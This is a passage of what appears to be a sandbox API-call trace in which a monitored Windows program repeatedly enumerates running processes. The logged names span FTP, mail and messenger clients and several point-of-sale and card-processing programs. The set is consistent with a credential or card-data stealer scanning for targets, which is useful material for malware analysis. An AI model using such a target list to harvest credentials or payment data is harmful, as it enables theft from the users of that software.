lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0219.190] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0219.197] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0219.229] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0219.231] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0219.233] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0219.235] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0219.237] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0219.239] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0219.243] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0219.282] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0219.285] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0219.326] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0219.330] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0219.332] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0219.334] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0219.336] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0219.339] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0219.340] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0219.342] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0219.344] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0219.346] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0219.348] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0219.350] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0219.351] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0219.353] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0219.355] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0219.357] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0219.359] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0219.360] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0219.362] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0219.405] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0219.407] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0219.409] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0219.411] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0219.412] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0219.414] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0219.416] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0219.418] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0219.422] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0219.424] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0219.426] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0219.427] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0219.429] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0219.431] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0219.433] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.434] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0219.436] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0219.438] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.440] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.442] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0219.490] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.492] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0219.493] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0219.495] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0219.496] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0219.498] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0219.499] CloseHandle (hObject=0x1eb8) returned 1 [0219.500] Sleep (dwMilliseconds=0x64) [0219.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0219.550] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.551] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.553] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.554] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.555] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.557] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.558] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.560] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.610] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.612] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.614] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.617] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.618] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.620] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.621] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.623] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.625] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.626] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.628] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.629] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.631] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0219.633] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0219.634] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0219.636] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.637] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, 